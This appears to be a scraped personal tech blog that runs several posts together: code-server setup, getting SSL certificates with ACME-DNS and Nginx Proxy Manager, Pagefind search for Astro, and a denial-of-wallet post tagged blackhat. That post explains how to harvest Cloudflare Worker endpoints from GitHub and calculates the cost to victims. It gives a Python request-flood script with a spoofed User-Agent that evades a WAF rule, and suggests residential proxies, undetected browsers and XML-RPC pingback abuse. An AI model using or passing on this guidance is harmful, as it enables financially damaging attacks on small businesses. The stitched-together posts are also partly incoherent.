In the fast-paced world of software development, flexibility and efficiency are paramount. Enter code-server, an innovative tool that allows you to run Visual Studio Code (VS Code) in your browser, bringing a seamless and consistent development environment to any device, anywhere.
Whether you’re working on a powerful desktop, a modest laptop, or even a tablet (pls don’t!), code-server ensures you have access to your development environment at all times. Here’s an in-depth look at what makes code-server a game-changer.
What is code-server ?
code-server is an open-source project that enables you to run VS Code on a remote server and access it via your web browser. This means you can:
• Work on any device with an internet connection.
• Leverage the power of cloud servers to handle resource-intensive tasks.
• Maintain a consistent development environment across devices.
With over 69.2k stars on GitHub, code-server has gained significant traction among developers, teams, and organizations looking for efficient remote development solutions.
Why would you use code-server ?
1. Flexibility Across Devices
Imagine coding on your laptop, switching to a tablet, or even a Chromebook, without missing a beat. With code-server, your development environment follows you wherever you go—seamlessly.
2. Offloading Performance to the Server
Running resource-intensive tasks on a server instead of your local machine? Yes, please! Whether you’re working on complex builds or handling large datasets, code-server takes the heavy lifting off your device and onto the server.
3. Bringing Your Dev Environment Closer to LLMs
With the rise of large language models (LLMs), working near powerful servers hosting these models has become a necessity. No more downloading terabytes of data just to test integrations locally. Code-server simplifies this by placing your environment right where the action is.
4. Because I Can! 🥳
As a coder and IT enthusiast, sometimes the best reason is simply: Because I can! Sure, you could run local VSCode with “Remote Development” extensions or install it directly on a Chromebook—but where’s the fun in that? 😉
5. Streamlined Backup and File Management
One of my favorite aspects? Developing directly on a remote system where my regular backup processes already take care of everything. No extra steps, no worries—just peace of mind knowing my work is secure.
I just did it to do it, I use code-server to manage all my Proxmox scrips and develop little Sysadmin tools. You also get a nice web shell.
Installation
Requirements
Before diving in, make sure your system meets the minimum requirements:
• Linux machine with WebSockets enabled. (this is important to know when you use a reverse proxy)
• At least 1 GB RAM and 2 vCPUs.
I think you can get away with 1 CPU, mine is bored most of the time, obviously running resource intensive code will eat more.
There are multiple ways to get started with code-server, but I choose the easiest one:
Bash
curl-fsSLhttps://code-server.dev/install.sh|sh
This script ensures code-server is installed correctly and even provides instructions for starting it. Never run script like this from the internet before checking it.
Configuration
After installation, you can customize code-server for your needs. Explore the setup and configuration guide to tweak settings, enable authentication, and enhance your workflow.
Bash
nano~/.config/code-server/config.yaml
That is where you will find the password to access code-server and you can also change the port:
Today, I’m going to show you how you can obtain real, trusted SSL certificates for your home network or even a public website. Using this method, you can achieve secure HTTPS for your web services with certificates that browsers recognize as valid. Fun fact: the very website you’re reading this on uses this same method!
This guide focuses on using ACME-DNS with Nginx Proxy Manager (NPM), a popular reverse proxy solution with a user-friendly web interface. Whether you’re setting up a self-hosted website, Nextcloud, or any other service, this approach can provide you with certificates signed by a trusted Certificate Authority (CA) for your home network or the public.
Prerequisites
I am assuming you are on a Debian based Linux distribution (I will use a Debian 12 LXC). This should work an any host supporting Docker though.
You should have some knowledge of Docker and Docker Compose and it should be installed. You can find a step by step guide here.
You need your own domain. I get mine from Namecheap but any provider works. (I usually change the Nameserver to Cloudflare and manage them there since Namecheap is cheaper to buy)
Please make sure you have these packages installed:
Bash
aptinstallcurljqnano
(Jup, I like nano. Feel free to use your editor of choice.)
For our installation we will be using Docker with Docker Compose:
docker-compose.yml
services: npm: image: 'jc21/nginx-proxy-manager:latest' restart: unless-stopped ports: - '443:443' - '81:81' # Admin Port# - '80:80' # not needed in this setup volumes: - ./data:/data - ./letsencrypt:/etc/letsencrypt# - ./custom-syslog.conf:/etc/nginx/conf.d/include/custom-syslog.conf
I only like to expose port 443, since we will be using ACME-DNS we will not need 80. Port 81 will be exposed for now, but once configured we will remove this too.
Now just run this command and you will be able to log in via http://your-ip:81 (replace “your-ip” with the actual IP of your machine, you can try http://127.0.0.1:81 if run locally)
Please take note of your output and copy it to a file or note taking tool for later.
We will need to edit this a little. If you set this up for your home network it is usually a good idea to use subdomain and a wildcard certificate, this will enable you to secure anything under that subdomain.
There should be a “data” directory in your current one from the docker command earlier. We will create a JSON config file for Nginx Proxy Manager, you can name it whatever you want.
Bash
ls# check if "data" dir existscddatananoacme__you_domain.json# use your domain name, but name does not matter
In this file you will need to paste the config. I suggest using a subdomain like “home”.
It is important to note that with a wildcard like this you can not do something like: “plex.media.home.your-domain.com”, you can only use the specified level of subdomain, if you did want to do a “sub-sub” you would need to use “*.media.home.your-domain.com” and so on.
A note on the “allowfrom": []“. If you have a static IP that you will always be coming from this is a good idea. Since this guide focuses on SSL for home you most likely have a dynamic IP which will work until it changes, so probably 24h or a week.
Configuring DNS Records
You need to edit your local DNS server and edit these in your registrar. I am using Cloudflare
Cloudflare
go to “your Domain -> DNS -> Records” there you will need to add a CNAME record.
In the “Name” field put “_acme-challenge.YOUR-SUBDOMAIN” in our example that would be like you see in the image below. In the “Target” field you put the “fulldomain” from your config, like “XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io“. Leave “Proxy status” on “DNS only”.
(If you are doing a public and not home only setup you would also add a A, AAAA or CNAME record pointing to your public IP. For home setup you do not need this.)
Local DNS
The devices in your network need to know that your reverse proxy aka. Nginx Proxy Manager is handling “*.home.your-domain.com” you need to add this to your local DNS server so whenever someone goes to “*.home.your-domain.com” it is directed to your proxy. Now if you have a Pi-Hole, AdGuard, pfSense, OPNSense or in your Router varies, technically you could even edit the hosts file of each device. I am using a Unifi Dream Machine :
In your dream machine go to: /network/default/settings/routing/dns
there you create a new entry like so:
Please use your configured domain and the IP of your system.
Bringing it all together
All we need to do now I configure our setup in the Nginx Proxy Manager. Go to your Admin interface at http://your-ip:81/nginx/certificates then click on “Add SSL-Certificate” and choose “Let’s Encrypt”
There is a lot going on here but I will explain:
In “Domain Names” enter the domains you have configured
Enter your E-Mail Address
Choose “ACME-DNS” in the Provider menu
In the API URL enter “https://auth.acme-dns.io”
the registration file is the JSON file we created earlier. Add whatever you called it in there, the path “/data/” should be fine if you followed all the steps.
Leave propagation empty
Finally just agree and save.
Your new certificate will pop up once the loading screen goes away.
It should look like this:
By the way, I have a profile image because I used my Gravatar email address for the admin login.
Securing the Nginx Proxy Manager Admin
Now that we have a certificate let us use it directly on our admin interface.
Add a new proxy host. Enter the domain of your choosing (you need to change “your-domain.com”. Since it is accessing itself in the Docker network the hostname is “npm” this is its name from the “docker-compose.yml” at the beginning.
Under the “SSL” tab just choose your created certificate.
You do not have to choose the options for Force SSL, HTTP/2 and Block Common Exploits for this to work.
Okay now press Save and test!
If it works you can now remove the port from the compose:
Now you can access your Nginx Proxy Manager admin interface via your new domain with a trusted SSL certificate.
Conclusion
Using ACME-DNS with Nginx Proxy Manager is a powerful way to obtain SSL certificates for your home network or website. It simplifies the process of handling DNS challenges and automates certificate issuance for secure HTTPS. You also will no longer have to expose your local services to the internet to get new certificates.
By following this guide, you’ve gained the tools to secure your online services with minimal hassle. Stay tuned for more tips on managing your self-hosted environment, and happy hosting!
In the fast-paced world of cyber warfare, attackers are always on the hunt for new ways to hit where it hurts – both in the virtual world and the wallet. The latest trend? Denial-of-Wallet (DoW) attacks, a crafty scheme aimed at draining the bank accounts of unsuspecting victims.
Serverless setups, touted for their flexibility and scalability, have become prime targets for these digital bandits. But fear not! Here’s your crash course in safeguarding your virtual vaults from these costly exploits.
What’s a DoW attack, anyway?
Think of it as the mischievous cousin of the traditional denial-of-service (DoS) onslaught. While DoS attacks aim to knock services offline, DoW attacks have a more sinister agenda: draining your bank account faster than you can say “cloud computing.”
Unlike their DDoS counterparts, DoW attacks zero in on serverless systems, where users pay for resources consumed by their applications. This means that a flood of malicious traffic could leave you with a bill so hefty, it’d make Scrooge McDuck blush.
But wait, there’s more!
With serverless computing, you’re not just outsourcing servers – you’re also outsourcing security concerns. If your cloud provider drops the ball on protection, you could be facing a whole buffet of cyber threats, not just DoW attacks.
Detecting & Protecting
Now, spotting a DoW attack isn’t as easy as checking your bank statement. Sure, a sudden spike in charges might raise eyebrows, but by then, the damage is done. Instead, take proactive measures like setting up billing alerts and imposing limits on resource usage. It’s like putting a lock on your wallet before heading into a crowded marketplace.
And let’s not forget about securing those precious credentials. If an attacker gains access to your cloud kingdom, they could wreak havoc beyond just draining your funds – we’re talking file deletions, instance terminations, the whole nine yards. So buckle up with least privilege services, multi-factor authentication, and service control policies to fortify your defenses.
In the arms race between cyber crooks and cloud defenders, staying one step ahead is key. So, arm yourself with knowledge, fortify your defenses, and may your cloud budgets remain forever full!
How to Attack
This is what you came here for, isn’t it ? Before I go on I would like to remind you of my Disclaimer.
Cloudflare
First of all, big shoutout to Cloudflare for actually providing a valuable free tier of services (they do not pay me or anything, I actually like them a lot).
Basically, they provide serverless functions called “Cloudflare Workers”, their endpoints usually look like this: worker-blah-blah-1337.blah.workers.dev You can also choose your own custom domain, but the default route is still enabled. I recommend you disable it, or else…well stay tuned.
$13.40 (7 ms of CPU time per request _ 100,000,000 requests – 30,000,000 included CPU ms) / 1,000,000 * $0.02
Total
$45.40
They actually mention denial-of-wallet attacks and how you can counter them, or at least lessen the impact.
Finding Cloudflare Workers
One of the easiest ways to find endpoints is GitHub using a simple query like this: ?q=workers.dev&type=code or using ?q=workers.dev&type=commits. As I am writign this I found 121.000 lines of code that include workers.dev, let us maybe subtract some duplicates and maybe you end up with 20.000, some of them actually being pretty big companies as well.
Using a tool like Plow, HTTP(S) benchmarking tool can do about 1.000.000 requeests per 10 seconds on a normal machine using 20 connections. Playing around with these you can probably get a lot more, but it depends on a lot of factores like bandwidth and internet speed etc. So in theory you could cost your target $120 per hour from your home PC/Laptop. If you got 3 of your friends involved you could cost your target almost $500 per hour. Since you are running a script 24/7 that’s costing your target $12000 day or $84000 a week. Now if your’re attacking an enterprise that may not even be that bad for them, but imagine a small company paying 12k every day. As I explained above, there is also no going back, that compute is consumed and will be charged. Depending on if they use something like KV and other services you can multiply these numbers. A pretty common pattern is to have one Worker act as an API gateway, so one request could actually trigger up to 50/100 sub-requests.
If, by just reading this, you feel bad, then congrats 🎉, you are probably one of the good guys, girls or anything in between.
Back to reality
Cloudflare being Cloudflare, they obviously have pretty good protections as is, in my experience better than AWS or Azure. So simply a running tool and hoping for carnage will not get you far.
Some additional protections Cloudflare provides are:
Being able to do all this easily for free, including their free DDoS protection should build up a nice barrier against such attacks. Looking at the bigger pricture, it is actually crazy that this can all be done for free, on AWS you would have to pay extra for all of these features and essentially denial-of-wallet yourself (😁).
Any protection is only good, if it is enabled and configured correctly. I am using the following WAF rule for example:
(nothttp.user_agentcontains"Mozilla/5.0")
This basically blocks everything that is not advertising itself as a browser. If you know a little tiny bit about how User Agents work, you know that getting around this rule is super simple. You would just need to write a script like this:
Python
import requestsurl ='SOME PROTECTED URL'headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',}# run 100 million requests with a timeout of one secondfor i inrange(1, 100000000): requests.get(url, timeout=1, headers=headers)
Now my simple filter rule thinks it is a browser and will let it through.
Check out my 24h WAF statistic:
As you can see most of the bots and scripts are blocked by this stupid simple rule. I am not showing you the rest of the rules, because I am literally explaining to you how you could get around my defenses, usually not a great idea on a post tagged #blackhat.
Real world attack
In a real world attack you will need residential proxies or multiple IPs with high rep. You then write a more advanced tool that autoamtes a browser, otherwise you will be detetcted very quickly. Even better if you use something like undetected_chromedriverfor more success.
Obviously you also want to add random waits, a script being run every second will light up like a christmas tree:
Python
from random import randintfrom time import sleepsleep(randint(0,5))
(You could just send as many requests as you want and have your hardware or internet connection add “organic” random waits, this will ultimatley lead to getting you blocked because of too many too fast requests)
You will need more machines with more residential IPs, as this will be a lot slower. You will slwoly drain your targets wallet this way though. I mean in the end you could have this running on something like a Raspberry Pi costing you next to nothing in electricity and just slowly attacking your target, depending on their setup each single request from your side could be 50 on theirs.
One other cool trick, which is actually still possbile, is to hijack WordPress websites that have xmlrpc.php enabled. This is called XML-RPC Pingback Attack and is as simple as:
As this post is getting longer I decided to end it here. These attacks work on any cloud based “serverless” provider that bills by usage. The key idea is to use as much of a companies “billed by usage” endpoints as possible.
In theory this can do a lot of damage, in practice you will have to do a little more than just send a billion request, as fast as possible with some script, to an endpoint. I highlighted some ways to get around protections above, but you will most likely have to come up with your own new/custom solution in order to outsmart your target.
Why Cloudflare ?
I picked Cloudflare as an example, because I use them for everything and really like them. (Again, I am not paid to say this, I actually like them). This attack works on any other provider as well, actually it will probably work the least on Cloudflare, because of their free DDoS protection.
Compared to AWS WAF the firewall alone would cost as much as the usage of Cloudflare Workers, so actually getting through the AWS WAF and then using a Lambda function, maybe even one that is reading some data from S3 would be disasterous.
Hey there, web wizards and code conjurers! Today, I’m here to spill the beans on a magical tool that’ll have you searching through your static site like a pro without sacrificing your users’ data to the digital overlords. Say goodbye to the snooping eyes of Algolia and Google, and say hello to Pagefind – the hero we need in the wild world of web development!
Pagefind
So, what’s the deal with Pagefind? Well, it’s like having your own personal search genie, but without the need for complex setups or sacrificing your site’s performance. Here’s a quick rundown of its enchanting features straight from the Pagefind spellbook:
Multilingual Magic: Zero-config support for sites that speak many tongues.
Filtering Sorcery: A powerful filtering engine for organizing your knowledge bases.
Custom Sorting Spells: Tailor your search results with custom sort attributes.
Metadata Mysticism: Keep track of custom metadata for your pages.
Weighted Wand Wielding: Adjust the importance of content in your search results.
Section Spellcasting: Fetch results from specific – sections of your pages.
Domain Diving: Search across multiple domains with ease.
Index Anything Incantation: From PDFs to JSON files, if it’s digital, Pagefind can find it!
Low-Bandwidth Brilliance: All this magic with minimal bandwidth consumption – now that’s some serious wizardry!
Summoning Pagefind
Now, let’s talk about summoning this mystical tool onto your Astro-powered site. It’s as easy as waving your wand and chanting npx pagefind --site "dist. Poof! Your site’s now equipped with the power of search!
With a flick of your build script wand, you’ll integrate Pagefind seamlessly into your deployment pipeline. Just like adding a secret ingredient to a potion, modify your package.json build script to include Pagefind’s magic words.
Now my site is not that big, yet but 0.043 seconds is still very fast and if you are pying for build time, also next to nothing. Pagefind being written in Rust is very efficient.
Getting Cozy with Pagefind’s UI
Alright, so now you’ve got this powerful search engine at your fingertips. But wait, what’s this? Pagefind’s UI is a bit… opinionated. Fear not, fellow sorcerers! With a dash of JavaScript and a sprinkle of CSS, we’ll make it dance to our tune!
Weaving a custom UI spell involves a bit of JavaScript incantation to tweak placeholders and buttons just the way we like them. Plus, with a bit of CSS wizardry, we can transform Pagefind’s UI into something straight out of our own enchanting design dreams!
/pagefind/pagefind-ui.js is Pagefind specific JavaScript.In the future I plan to reverse it as there is a lot of uneccessary code in there.
I am using astro:page-load as an event listener since I am using view transitions.
Embrace Your Inner Stylist
Ah,but crafting a unique style for your search UI is where the real fun begins!With the power of TailwindCSS (or your trusty CSS wand),you can mold Pagefind’s UI to fit your site’s aesthetic like a bespoke wizard robe.
With a little imagination and a lot of creativity,you’ll end up with a search UI that’s as unique as your magical incantations.
(@apply is TailwindCSS specific,you can use regular CSS if you please)
And there you have it,folks – the mystical journey of integrating Pagefind into your static site,complete with a touch of your own wizardly flair!
Now go forth,weave your web spells,and may your users’ search journeys be as magical as your coding adventures!🧙✨
Where to go from here
I gave you a quick look into building a simple static site search.In my opinion the JavaSript files from Pagefind should be slimmed down to work,in my case for Astro,the CSS should be applied by you and Pagefind should just leave you a simple unstyled search,I am sure they would be happy if someone helped them out by doing this.
I was thinking about hosting my index on a Cloudflare Worker,then styling my search form however I want and just hooking up the Worker endpoint with the form,basically like a self hosted Algolia.An alternative to Pagefind could be Fuse.js,the drawback is that you would have to build your own index.
This post was originally posted on 17 Mar 2024 at on myCybersecurity blog.
Manage Consent
To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.
Functional
Always active
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
Preferences
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Statistics
The technical storage or access that is used exclusively for statistical purposes.The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Marketing
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.